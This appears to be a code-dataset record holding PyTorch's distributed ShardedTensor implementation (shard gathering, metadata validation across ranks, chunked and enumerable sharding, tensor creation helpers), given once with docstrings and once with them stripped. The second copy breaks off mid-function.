args=(all_tensor_ids[rank_to_name[rank]], rrefs, rpc_rank))
futs.append(fut)
torch.futures.wait_all(futs)
# Barrier for all RPCs to finish on all ranks.
rpc.api._all_gather(None)
def gather(
self,
dst: int = 0,
out: Optional[torch.Tensor] = None,
) -> None:
"""
Creates a full :class:`Tensor` on rank ``dst`` by gathering all shards of the
sharded tensor.
The API needs to be called on all ranks in SPMD fashion. All ranks should have
the same ``dst``. ``out`` should be a tensor of the same size as the overall
size of the sharded tensor on ``dst`` and ``None`` on all other ranks.
Args:
dst(int): The rank where full tensor is constructed.
Default: 0
out (:class `torch.Tensor`, optional): The output full tensor.
Must to be provided ONLY on ``dst`` rank.
Default: ``None``
"""
rank = dist.get_rank(self._process_group)
full_size = self.metadata().size
_validate_output_tensor_for_gather(rank, dst, full_size, out)
local_shards = self.local_shards()
world_size = dist.get_world_size(self._process_group)
gathered_shards = [None] * world_size
# will revise this part with CPU support and use dist.gather()
# once NCCL support for gather() is ready
# https://github.com/pytorch/pytorch/issues/66187
dist.all_gather_object(
obj=local_shards,
object_list=gathered_shards,
group=self._process_group,
)
if rank == dst:
dims = len(full_size)
for shards in gathered_shards:
if shards is None:
raise RuntimeError(
'Gathered shards cannot be None on dst rank {dst}'
)
for shard in shards:
metadata = shard.metadata
tensor = shard.tensor
out_narrow_view = out
for dim in range(dims):
out_narrow_view = out_narrow_view.narrow(
dim,
metadata.shard_offsets[dim],
metadata.shard_sizes[dim],
)
out_narrow_view.copy_(tensor)
@classmethod
def _init_from_local_shards(
cls,
local_shards: List[Shard],
*global_size,
process_group=None,
init_rrefs=False,
):
# STEP 1: Validate the Shardmetadatas locally
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
world_size = dist.get_world_size(process_group)
local_sharded_tensor_metadata: Optional[ShardedTensorMetadata] = None
global_tensor_size = _flatten_tensor_size(global_size)
if len(local_shards) > 0:
local_sharded_tensor_metadata = \
build_metadata_from_local_shards(local_shards, global_tensor_size, current_rank, process_group)
# STEP 2. Validate metadata across ranks, and build a global sharded tensor
# metadata by gathering local ShardedTensorMetadata
gathered_metadatas: List[Optional[ShardedTensorMetadata]] = []
if world_size > 1:
gathered_metadatas = [None for _ in range(world_size)]
dist.all_gather_object(
gathered_metadatas,
local_sharded_tensor_metadata,
group=process_group
)
else:
gathered_metadatas = [local_sharded_tensor_metadata]
global_sharded_tensor_metadata = build_global_metadata(gathered_metadatas)
# STEP 3: Validation done, create the actual ShardedTensor and populate fields
# prepare initialization
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
# add to metadata and local_shards
sharded_tensor._metadata = global_sharded_tensor_metadata
sharded_tensor._local_shards = local_shards
# make a EnumerableShardingSpec for sharded tensors that initialized from this API.
# TODO: make sharding spec a ChunkShardingSpec by inferring from the metadata list.
# see issue https://github.com/pytorch/pytorch/issues/67244
sharded_tensor._sharding_spec = EnumerableShardingSpec(global_sharded_tensor_metadata.shards_metadata)
# run post initialization, i.e. map registration, rpc initialization
sharded_tensor._post_init()
return sharded_tensor
@classmethod
def _init_from_local_shards_and_global_metadata(
cls,
local_shards: List[Shard],
sharded_tensor_metadata: ShardedTensorMetadata,
process_group=None,
init_rrefs=False,
) -> "ShardedTensor":
"""
Initialize a ShardedTensor with local shards and a global
ShardedTensorMetadata built on each rank.
Warning: This API is experimental and subject to change. It does
not do cross rank validations, and fully rely on the user
for the correctness of sharded_tensor_metadata on each rank
"""
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
shards_metadata = sharded_tensor_metadata.shards_metadata
tensor_properties = sharded_tensor_metadata.tensor_properties
if len(shards_metadata) == 0:
raise ValueError("shards_metadata must not be empty!")
if tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
sharded_tensor._metadata = sharded_tensor_metadata
local_shard_metadatas = []
def _raise_if_mismatch(expected, actual, prop_name, rank, is_property=False):
tensor_property_or_metadata = "tensor property" if is_property else "local ShardMetadata"
if expected != actual:
raise ValueError(f"Local shards' tensor {prop_name} property is incompatible with "
f"{tensor_property_or_metadata} on rank {rank}: "
f"{tensor_property_or_metadata} {prop_name}={expected}, "
f"local shard tensor {prop_name}={actual}.")
# collect local shard metadatas from the global sharded_tensor_metadata
for shard_metadata in shards_metadata: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_metadata.placement)
if current_rank == rank:
local_shard_metadatas.append(shard_metadata)
if len(local_shards) != len(local_shard_metadatas):
raise RuntimeError(
f'Number of local shards ({len(local_shards)}) does not match number of local '
f'shards metadata in sharded_tensor_metadata ({len(local_shard_metadatas)}) '
f'on rank ({current_rank}) '
)
for shard in local_shards:
shard_meta = shard.metadata
local_shard_tensor = shard.tensor
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_meta.placement)
# validate if shard_meta in the metadatas collected from sharded_tensor_metadata
assert shard_meta in local_shard_metadatas, \
"local shard metadata not in sharded_tensor_metadata!"
_raise_if_mismatch(tensor_properties.layout, local_shard_tensor.layout, "layout", current_rank, True)
if not local_shard_tensor.is_contiguous():
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
_raise_if_mismatch(shard_meta.shard_sizes, list(local_shard_tensor.size()), "size", current_rank)
_raise_if_mismatch(tensor_properties.pin_memory, local_shard_tensor.is_pinned(), "pin_memory", current_rank, True)
_raise_if_mismatch(local_device, local_shard_tensor.device, "device", current_rank)
_raise_if_mismatch(tensor_properties.dtype, local_shard_tensor.dtype, "dtype", current_rank, True)
_raise_if_mismatch(
tensor_properties.requires_grad, local_shard_tensor.requires_grad, "requires_grad", current_rank, True)
# check if shards_metadata have overlap shards
validate_non_overlapping_shards_metadata(shards_metadata)
# check if the shards_metadata is compatible with overall size of the sharded tensor.
check_tensor(shards_metadata, list(sharded_tensor_metadata.size))
# done validation, add local_shards
sharded_tensor._local_shards = local_shards
# make a EnumerableShardingSpec for sharded tensors that initialized from this API.
# TODO: make sharding spec a ChunkShardingSpec by inferring from the metadata list.
# see issue https://github.com/pytorch/pytorch/issues/67244
sharded_tensor._sharding_spec = EnumerableShardingSpec(shards_metadata)
# run post initialization, i.e. map registration, rpc initialization
sharded_tensor._post_init()
return sharded_tensor
def _init_chunked(self, dims, tensor_init_params: TensorInitParams, ):
current_rank = dist.get_rank(self._process_group)
sharding_dim = self._sharding_spec.dim # type: ignore[attr-defined]
# Validate the sharding spec.
if not isinstance(sharding_dim, int):
raise ValueError(
f"Sharding dim needs to be an integer, found: {sharding_dim}"
)
if sharding_dim >= len(dims) or sharding_dim < -len(dims):
raise ValueError(f"Invalid sharding dim: {sharding_dim}")
dim_size = dims[sharding_dim]
remote_devices = self._sharding_spec.placements # type: ignore[attr-defined]
chunks = len(remote_devices)
# split_size computed similar to 'torch.chunk'
split_size = get_split_size(dim_size, chunks)
shards_metadata = []
for idx, remote_device in enumerate(remote_devices):
rank, local_device = _parse_and_validate_remote_device(self._process_group, remote_device)
# Adjust the sharding dim for this rank.
sharded_dim_size = get_chunked_dim_size(dim_size, split_size, idx)
if sharded_dim_size > 0:
# Build sharding_metadata.
# deepcopy for modification.
rank_dims = dims.copy()
rank_offsets = [0] * len(dims)
rank_offsets[sharding_dim] = split_size * idx
rank_dims[sharding_dim] = sharded_dim_size
shard_metadata = ShardMetadata(rank_offsets, rank_dims, remote_device)
shards_metadata.append(shard_metadata)
# Build the local shard for the current rank if it is involved in the sharding spec.
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*rank_dims, local_device=local_device, tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def _init_enumerable(self, dims, tensor_init_params: TensorInitParams):
# Validate the sharding spec is compatible with the tensor.
check_tensor(self._sharding_spec.shards, dims) # type: ignore[attr-defined]
current_rank = dist.get_rank(self._process_group)
shards_metadata = []
for shard_metadata in self._sharding_spec.shards: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(self._process_group, shard_metadata.placement)
shards_metadata.append(shard_metadata)
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*shard_metadata.shard_sizes, local_device=local_device,
tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def sharding_spec(self) -> ShardingSpec:
"""
Returns the ShardingSpec for the tensor.
"""
return self._sharding_spec
def __torch_function__(self, func, types, args=(), kwargs=None):
if func in _SHARDED_OPS:
return _SHARDED_OPS[func](types, args, kwargs, self._process_group)
raise RuntimeError(
f"torch function '{func.__name__}', with args: {args} and "
f"kwargs: {kwargs} not supported for ShardedTensor!")
def metadata(self) -> ShardedTensorMetadata:
"""
Returns a :class:`ShardedTensorMetadata` object corresponding to the
metadata for the entire tensor.
"""
return self._metadata
def local_shards(self) -> List[Shard]:
"""
Returns a list of :class:`Shard' corresponding to the
local shards for this rank. Returns an empty list if the current rank
does not host any shards for this Tensor.
"""
return self._local_shards
def size(self, dim: int = None) -> Union[torch.Size, int]:
"""
Returns a :Union:`[torch.Size, int]` which represents the size of the tensor.
The dimension can be specified.
Args:
dim (int, optional): the dimension over which the size represents.
If specified, it returns the size of the given dimension.
If not, it returns a subclass of tuple.
Default: ``None``
Returns:
A :Union:`[torch.Size, int]` represents the size of the tensor.
"""
size = self._metadata.size
if dim is None:
return size
if dim < 0 or dim >= len(size):
raise ValueError(
f"Argument ``dim`` must be within the range of tensor dimensions [0, {len(size)})"
)
return size[dim]
def is_pinned(self) -> bool:
"""
Returns True if the sharded tensor (each local shard) resides in pinned memory.
"""
return self._metadata.tensor_properties.pin_memory
def is_contiguous(self) -> bool:
"""
Returns True if the sharded tensor (each local shard) is contiguous in memory
in the order specified by memory format.
"""
return self._metadata.tensor_properties.memory_format == torch.contiguous_format
@property
def shape(self):
return self._metadata.size
@property
def requires_grad(self):
return self._metadata.tensor_properties.requires_grad
@property
def dtype(self):
return self._metadata.tensor_properties.dtype
@property
def layout(self):
return self._metadata.tensor_properties.layout
def _register_remote_shards(self, remote_shards: List[rpc.RRef[Shard]], rpc_rank: int):
self._remote_shards[rpc_rank] = remote_shards
def remote_shards(self) -> Dict[int, List[rpc.RRef[Shard]]]:
"""
Returns a Dict[int, RRef] with keys being the RPC rank and values
being RRefs to shards on that rank. Need to initialize the
RPC framework for this functionality.
Raises an exception if ShardedTensor was created with ``init_rrefs=False``
"""
if not self._init_rrefs:
raise RuntimeError(
'ShardedTensor created with init_rrefs=False, no RRefs to remote shards available'
)
return self._remote_shards
def __hash__(self):
return id(self)
def __repr__(self):
return f'ShardedTensor({self._metadata})'
@dataclass
class ProcessGroupState:
"""
State for ser-de of process group
"""
local_rank: int
global_rank: int
local_world_size: int
global_world_size: int
def __getstate__(self):
pg_state = ShardedTensor.ProcessGroupState(
distributed_c10d.get_rank(self._process_group),
distributed_c10d.get_rank(),
distributed_c10d.get_world_size(self._process_group),
distributed_c10d.get_world_size(),
)
return self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs
def __setstate__(self, state):
self._sharded_tensor_id = None
if not distributed_c10d.is_initialized():
raise RuntimeError(
'Need to initialize default process group using '
'"init_process_group" before loading ShardedTensor')
self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs = state
# Setup process group
self._process_group = get_current_process_group()
# Validate process group.
local_rank = distributed_c10d.get_rank(self._process_group)
if pg_state.local_rank != local_rank:
raise RuntimeError(
f'Local rank at save time was {pg_state.local_rank}, but at '
f'load time was {local_rank}')
global_rank = distributed_c10d.get_rank()
if pg_state.global_rank != global_rank:
raise RuntimeError(
f'Global rank at save time was {pg_state.global_rank}, but at '
f'load time was {global_rank}')
local_world_size = distributed_c10d.get_world_size(self._process_group)
if pg_state.local_world_size != local_world_size:
raise RuntimeError(
f'Local world size at save time was {pg_state.local_world_size}, '
f'but at load time was {local_world_size}')
global_world_size = distributed_c10d.get_world_size()
if pg_state.global_world_size != global_world_size:
raise RuntimeError(
f'Global world size at save time was {pg_state.global_world_size}, '
f'but at load time was {global_world_size}')
self._post_init()
def _create_tensor_from_params(*size, local_device, tensor_init_params: TensorInitParams):
""" Helper to construct tensor from size, device and common params. """
create_op = tensor_init_params.create_op
dtype = tensor_init_params.tensor_properties.dtype
layout = tensor_init_params.tensor_properties.layout
requires_grad = tensor_init_params.tensor_properties.requires_grad
memory_format = tensor_init_params.tensor_properties.memory_format
pin_memory = tensor_init_params.tensor_properties.pin_memory
if create_op == CreateOp.ONES:
return torch.ones(*size, dtype=dtype, layout=layout,
device=local_device, pin_memory=pin_memory,
requires_grad=requires_grad,)
elif create_op == CreateOp.EMPTY:
return torch.empty(*size, dtype=dtype, layout=layout,
device=local_device, requires_grad=requires_grad,
# NB: memory_format param is not accepted by torch.ones
memory_format=memory_format, pin_memory=pin_memory,)
elif tensor_init_params.create_op == CreateOp.ZEROS:
return torch.zeros(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.RAND:
return torch.rand(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.FULL:
return torch.full(size=size,
fill_value=tensor_init_params.fill_value,
layout=layout,
dtype=dtype,
requires_grad=requires_grad,
device=local_device, )
else:
raise ValueError(f'Unsupported create_op: {tensor_init_params.create_op}')
| 40.637931
| 126
| 0.649163
|
from dataclasses import dataclass, field
from enum import Enum
from typing import (
Callable,
Dict,
List,
Optional,
Union
)
import weakref
import threading
import torch
import torch.distributed as dist
from torch.distributed import rpc
from torch.distributed import distributed_c10d
from torch.distributed._sharding_spec import (
ChunkShardingSpec,
EnumerableShardingSpec,
ShardMetadata,
ShardingSpec,
)
from torch.distributed._sharding_spec._internals import (
check_tensor,
get_split_size,
get_chunked_dim_size,
validate_non_overlapping_shards_metadata,
)
from torch.types import Number
from .metadata import TensorProperties, ShardedTensorMetadata
from .shard import Shard
from .utils import (
get_current_process_group,
_flatten_tensor_size,
_parse_and_validate_remote_device,
_validate_output_tensor_for_gather,
build_metadata_from_local_shards,
build_global_metadata
)
_sharded_tensor_lock = threading.Lock()
_sharded_tensor_current_id = 0
_sharded_tensor_map: Dict[int, 'weakref.ReferenceType[ShardedTensor]'] = {}
_SHARDED_OPS: Dict[str, Callable] = {}
def _register_sharded_op(op, func):
from inspect import signature
if len(signature(func).parameters) != 4:
raise TypeError(
f'Custom sharded op function expects signature: '
f'(types, args, kwargs, process_group), but received '
f'signature: {signature(func)}')
global _SHARDED_OPS
_SHARDED_OPS[op] = func
def _register_remote_shards(sharded_tensor_id: int, rrefs: List[rpc.RRef[Shard]], rpc_rank: int):
with _sharded_tensor_lock:
if sharded_tensor_id not in _sharded_tensor_map:
raise RuntimeError(
f'Could not find sharded_tensor_id: {sharded_tensor_id} in map: {_sharded_tensor_map.keys()}')
sharded_tensor = _sharded_tensor_map[sharded_tensor_id]()
if sharded_tensor is None:
raise RuntimeError('ShardedTensor weakref has been deallocated')
else:
sharded_tensor._register_remote_shards(rrefs, rpc_rank)
class CreateOp(Enum):
EMPTY = 0
FULL = 1
ONES = 2
RAND = 3
ZEROS = 4
@dataclass
class TensorInitParams(object):
create_op: CreateOp
fill_value: Number = field(default=False)
tensor_properties: TensorProperties = field(
default=TensorProperties(dtype=torch.get_default_dtype(),
layout=torch.strided,
requires_grad=False,
memory_format=torch.contiguous_format,
pin_memory=False))
class ShardedTensor(object):
def __new__(cls, *args, **kwargs):
torch._C._log_api_usage_once("torch.distributed.sharded_tensor")
return super(ShardedTensor, cls).__new__(cls)
def __init__(
self,
sharding_spec: ShardingSpec,
*size,
tensor_init_params: TensorInitParams,
process_group=None,
init_rrefs=False,
):
self._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
if tensor_init_params.tensor_properties is None:
raise ValueError('tensor_properties must not be None.')
if tensor_init_params.tensor_properties.dtype is None:
tensor_init_params.tensor_properties.dtype = torch.get_default_dtype()
if tensor_init_params.tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
if tensor_init_params.tensor_properties.memory_format != torch.contiguous_format:
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
dims = _flatten_tensor_size(size)
self._sharding_spec = sharding_spec
if isinstance(self._sharding_spec, ChunkShardingSpec):
self._init_chunked(dims, tensor_init_params)
elif isinstance(self._sharding_spec, EnumerableShardingSpec):
self._init_enumerable(dims, tensor_init_params)
else:
raise ValueError(f'Unsupported sharding_spec: {self._sharding_spec}')
self._post_init()
def _prepare_init(self, process_group=None, init_rrefs=False):
self._init_rrefs = init_rrefs
self._sharded_tensor_id = None
self._process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
self._local_shards: List[Shard] = []
self._remote_shards: Dict[int, List[rpc.RRef[Shard]]] = {}
def _post_init(self):
if self._init_rrefs:
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
self._sharded_tensor_id = _sharded_tensor_current_id
_sharded_tensor_map[self._sharded_tensor_id] = weakref.ref(self)
_sharded_tensor_current_id += 1
if not rpc._is_current_rpc_agent_set():
raise RuntimeError(
'RPC Framework needs to be initialized using'
' torch.distributed.rpc.init_rpc if init_rrefs is set to True')
self._init_rpc()
def __del__(self):
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
if self._sharded_tensor_id in _sharded_tensor_map:
_sharded_tensor_map.pop(self._sharded_tensor_id)
def _init_rpc(self):
pg_rank = dist.get_rank()
rpc_rank = rpc.get_worker_info().id
if pg_rank != rpc_rank:
raise ValueError(
f'Default ProcessGroup and RPC ranks must be '
f'the same for ShardedTensor, found process group rank: '
f'{pg_rank} and RPC rank: {rpc_rank}'
)
self._remote_shards = {}
worker_infos = rpc._get_current_rpc_agent().get_worker_infos()
rank_to_name = {}
name_to_rank = {}
for worker_info in worker_infos:
rank_to_name[worker_info.id] = worker_info.name
name_to_rank[worker_info.name] = worker_info.id
all_tensor_ids = rpc.api._all_gather(self._sharded_tensor_id)
futs = []
rpc_rank = rpc.get_worker_info().id
for rank in range(dist.get_world_size()):
if rank == dist.get_rank():
continue
if len(self.local_shards()) != 0:
rrefs: List[rpc.RRef[Shard]] = [rpc.RRef(shard) for shard in self.local_shards()]
fut = rpc.rpc_async(
rank,
_register_remote_shards,
args=(all_tensor_ids[rank_to_name[rank]], rrefs, rpc_rank))
futs.append(fut)
torch.futures.wait_all(futs)
rpc.api._all_gather(None)
def gather(
self,
dst: int = 0,
out: Optional[torch.Tensor] = None,
) -> None:
rank = dist.get_rank(self._process_group)
full_size = self.metadata().size
_validate_output_tensor_for_gather(rank, dst, full_size, out)
local_shards = self.local_shards()
world_size = dist.get_world_size(self._process_group)
gathered_shards = [None] * world_size
dist.all_gather_object(
obj=local_shards,
object_list=gathered_shards,
group=self._process_group,
)
if rank == dst:
dims = len(full_size)
for shards in gathered_shards:
if shards is None:
raise RuntimeError(
'Gathered shards cannot be None on dst rank {dst}'
)
for shard in shards:
metadata = shard.metadata
tensor = shard.tensor
out_narrow_view = out
for dim in range(dims):
out_narrow_view = out_narrow_view.narrow(
dim,
metadata.shard_offsets[dim],
metadata.shard_sizes[dim],
)
out_narrow_view.copy_(tensor)
@classmethod
def _init_from_local_shards(
cls,
local_shards: List[Shard],
*global_size,
process_group=None,
init_rrefs=False,
):
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
world_size = dist.get_world_size(process_group)
local_sharded_tensor_metadata: Optional[ShardedTensorMetadata] = None
global_tensor_size = _flatten_tensor_size(global_size)
if len(local_shards) > 0:
local_sharded_tensor_metadata = \
build_metadata_from_local_shards(local_shards, global_tensor_size, current_rank, process_group)
gathered_metadatas: List[Optional[ShardedTensorMetadata]] = []
if world_size > 1:
gathered_metadatas = [None for _ in range(world_size)]
dist.all_gather_object(
gathered_metadatas,
local_sharded_tensor_metadata,
group=process_group
)
else:
gathered_metadatas = [local_sharded_tensor_metadata]
global_sharded_tensor_metadata = build_global_metadata(gathered_metadatas)
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
sharded_tensor._metadata = global_sharded_tensor_metadata
sharded_tensor._local_shards = local_shards
sharded_tensor._sharding_spec = EnumerableShardingSpec(global_sharded_tensor_metadata.shards_metadata)
sharded_tensor._post_init()
return sharded_tensor
@classmethod
def _init_from_local_shards_and_global_metadata(
cls,
local_shards: List[Shard],
sharded_tensor_metadata: ShardedTensorMetadata,
process_group=None,
init_rrefs=False,
) -> "ShardedTensor":
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
shards_metadata = sharded_tensor_metadata.shards_metadata
tensor_properties = sharded_tensor_metadata.tensor_properties
if len(shards_metadata) == 0:
raise ValueError("shards_metadata must not be empty!")
if tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
sharded_tensor._metadata = sharded_tensor_metadata
local_shard_metadatas = []
def _raise_if_mismatch(expected, actual, prop_name, rank, is_property=False):
tensor_property_or_metadata = "tensor property" if is_property else "local ShardMetadata"
if expected != actual:
raise ValueError(f"Local shards' tensor {prop_name} property is incompatible with "
f"{tensor_property_or_metadata} on rank {rank}: "
f"{tensor_property_or_metadata} {prop_name}={expected}, "
f"local shard tensor {prop_name}={actual}.")
# collect local shard metadatas from the global sharded_tensor_metadata
for shard_metadata in shards_metadata: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_metadata.placement)
if current_rank == rank:
local_shard_metadatas.append(shard_metadata)
if len(local_shards) != len(local_shard_metadatas):
raise RuntimeError(
f'Number of local shards ({len(local_shards)}) does not match number of local '
f'shards metadata in sharded_tensor_metadata ({len(local_shard_metadatas)}) '
f'on rank ({current_rank}) '
)
for shard in local_shards:
shard_meta = shard.metadata
local_shard_tensor = shard.tensor
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_meta.placement)
# validate if shard_meta in the metadatas collected from sharded_tensor_metadata
assert shard_meta in local_shard_metadatas, \
"local shard metadata not in sharded_tensor_metadata!"
_raise_if_mismatch(tensor_properties.layout, local_shard_tensor.layout, "layout", current_rank, True)
if not local_shard_tensor.is_contiguous():
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
_raise_if_mismatch(shard_meta.shard_sizes, list(local_shard_tensor.size()), "size", current_rank)
_raise_if_mismatch(tensor_properties.pin_memory, local_shard_tensor.is_pinned(), "pin_memory", current_rank, True)
_raise_if_mismatch(local_device, local_shard_tensor.device, "device", current_rank)
_raise_if_mismatch(tensor_properties.dtype, local_shard_tensor.dtype, "dtype", current_rank, True)
_raise_if_mismatch(
tensor_properties.requires_grad, local_shard_tensor.requires_grad, "requires_grad", current_rank, True)
# check if shards_metadata have overlap shards
validate_non_overlapping_shards_metadata(shards_metadata)
# check if the shards_metadata is compatible with overall size of the sharded tensor.
check_tensor(shards_metadata, list(sharded_tensor_metadata.size))
# done validation, add local_shards
sharded_tensor._local_shards = local_shards
# make a EnumerableShardingSpec for sharded tensors that initialized from this API.
# TODO: make sharding spec a ChunkShardingSpec by inferring from the metadata list.
# see issue https://github.com/pytorch/pytorch/issues/67244
sharded_tensor._sharding_spec = EnumerableShardingSpec(shards_metadata)
# run post initialization, i.e. map registration, rpc initialization
sharded_tensor._post_init()
return sharded_tensor
def _init_chunked(self, dims, tensor_init_params: TensorInitParams, ):
current_rank = dist.get_rank(self._process_group)
sharding_dim = self._sharding_spec.dim # type: ignore[attr-defined]
# Validate the sharding spec.
if not isinstance(sharding_dim, int):
raise ValueError(
f"Sharding dim needs to be an integer, found: {sharding_dim}"
)
if sharding_dim >= len(dims) or sharding_dim < -len(dims):
raise ValueError(f"Invalid sharding dim: {sharding_dim}")
dim_size = dims[sharding_dim]
remote_devices = self._sharding_spec.placements # type: ignore[attr-defined]
chunks = len(remote_devices)
# split_size computed similar to 'torch.chunk'
split_size = get_split_size(dim_size, chunks)
shards_metadata = []
for idx, remote_device in enumerate(remote_devices):
rank, local_device = _parse_and_validate_remote_device(self._process_group, remote_device)
# Adjust the sharding dim for this rank.
sharded_dim_size = get_chunked_dim_size(dim_size, split_size, idx)
if sharded_dim_size > 0:
# Build sharding_metadata.
# deepcopy for modification.
rank_dims = dims.copy()
rank_offsets = [0] * len(dims)
rank_offsets[sharding_dim] = split_size * idx
rank_dims[sharding_dim] = sharded_dim_size
shard_metadata = ShardMetadata(rank_offsets, rank_dims, remote_device)
shards_metadata.append(shard_metadata)
# Build the local shard for the current rank if it is involved in the sharding spec.
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*rank_dims, local_device=local_device, tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def _init_enumerable(self, dims, tensor_init_params: TensorInitParams):
# Validate the sharding spec is compatible with the tensor.
check_tensor(self._sharding_spec.shards, dims) # type: ignore[attr-defined]
current_rank = dist.get_rank(self._process_group)
shards_metadata = []
for shard_metadata in self._sharding_spec.shards: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(self._process_group, shard_metadata.placement)
shards_metadata.append(shard_metadata)
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*shard_metadata.shard_sizes, local_device=local_device,
tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def sharding_spec(self) -> ShardingSpec:
return self._sharding_spec
def __torch_function__(self, func, types, args=(), kwargs=None):
if func in _SHARDED_OPS:
return _SHARDED_OPS[func](types, args, kwargs, self._process_group)
raise RuntimeError(
f"torch function '{func.__name__}', with args: {args} and "
f"kwargs: {kwargs} not supported for ShardedTensor!")
def metadata(self) -> ShardedTensorMetadata:
return self._metadata
def local_shards(self) -> List[Shard]:
return self._local_shards
def size(self, dim: int = None) -> Union[torch.Size, int]:
size = self._metadata.size
if dim is None:
return size
if dim < 0 or dim >= len(size):
raise ValueError(
f"Argument ``dim`` must be within the range of tensor dimensions [0, {len(size)})"
)
return size[dim]
def is_pinned(self) -> bool:
return self._metadata.tensor_properties.pin_memory
def is_contiguous(self) -> bool:
return self._metadata.tensor_properties.memory_format == torch.contiguous_format
@property
def shape(self):
return self._metadata.size
@property
def requires_grad(self):
return self._metadata.tensor_properties.requires_grad
@property
def dtype(self):
return self._metadata.tensor_properties.dtype
@property
def layout(self):
return self._metadata.tensor_properties.layout
def _register_remote_shards(self, remote_shards: List[rpc.RRef[Shard]], rpc_rank: int):
self._remote_shards[rpc_rank] = remote_shards
def remote_shards(self) -> Dict[int, List[rpc.RRef[Shard]]]:
if not self._init_rrefs:
raise RuntimeError(
'ShardedTensor created with init_rrefs=False, no RRefs to remote shards available'
)
return self._remote_shards
def __hash__(self):
return id(self)
def __repr__(self):
return f'ShardedTensor({self._metadata})'
@dataclass
class ProcessGroupState:
local_rank: int
global_rank: int
local_world_size: int
global_world_size: int
def __getstate__(self):
pg_state = ShardedTensor.ProcessGroupState(
distributed_c10d.get_rank(self._process_group),
distributed_c10d.get_rank(),
distributed_c10d.get_world_size(self._process_group),
distributed_c10d.get_world_size(),
)
return self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs
def __setstate__(self, state):
self._sharded_tensor_id = None
if not distributed_c10d.is_initialized():
raise RuntimeError(
'Need to initialize default process group using '
'"init_process_group" before loading ShardedTensor')
self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs = state
# Setup process group
self._process_group = get_current_process_group()
# Validate process group.
local_rank = distributed_c10d.get_rank(self._process_group)
if pg_state.local_rank != local_rank:
raise RuntimeError(
f'Local rank at save time was {pg_state.local_rank}, but at '
f'load time was {local_rank}')
global_rank = distributed_c10d.get_rank()
if pg_state.global_rank != global_rank:
raise RuntimeError(
f'Global rank at save time was {pg_state.global_rank}, but at '
f'load time was {global_rank}')
local_world_size = distributed_c10d.get_world_size(self._process_group)
if pg_state.local_world_size != local_world_size:
raise RuntimeError(
f'Local world size at save time was {pg_state.local_world_size}, '
f'but at load time was {local_world_size}')
global_world_size = distributed_c10d.get_world_size()
if pg_state.global_world_size != global_world_size:
raise RuntimeError(
f'Global world size at save time was {pg_state.global_world_size}, '
f'but at load time was {global_world_size}')
self._post_init()
def _create_tensor_from_params(*size, local_device, tensor_init_params: TensorInitParams):
create_op = tensor_init_params.create_op
dtype = tensor_init_params.tensor_properties.dtype
layout = tensor_init_params.tensor_properties.layout
requires_grad = tensor_init_params.tensor_properties.requires_grad
memory_format = tensor_init_params.tensor_properties.memory_format
pin_memory = tensor_init_params.tensor_properties.pin_memory
if create_op == CreateOp.ONES:
return torch.ones(*size, dtype=dtype, layout=layout,
device=local_device, pin_memory=pin_memory,
requires_grad=requires_grad,)
elif create_op == CreateOp.EMPTY:
return torch.empty(*size, dtype=dtype, layout=layout,
device=local_device, requires_grad=requires_grad,
